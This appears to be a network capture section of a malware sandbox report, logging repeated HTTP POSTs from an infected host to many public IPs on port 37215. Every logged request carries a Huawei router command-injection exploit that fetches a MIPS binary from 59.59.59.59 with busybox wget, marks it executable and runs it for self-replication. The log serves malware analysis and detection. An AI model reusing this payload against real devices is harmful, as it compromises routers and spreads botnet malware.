                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1803192.168.2.1553650197.178.252.137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.956208944 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1804192.168.2.1539262157.239.214.23537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.961189985 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1805192.168.2.154504641.122.220.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.961287975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1806192.168.2.155001241.255.124.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.961311102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1807192.168.2.1533464146.151.112.12537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.961359978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1808192.168.2.154950841.165.141.3237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.961457014 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1809192.168.2.1547568197.238.48.3337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.961471081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1810192.168.2.1547330157.139.64.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.966665030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1811192.168.2.1542576197.9.191.16937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.966691971 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1812192.168.2.1541980157.248.217.21837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.966794014 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 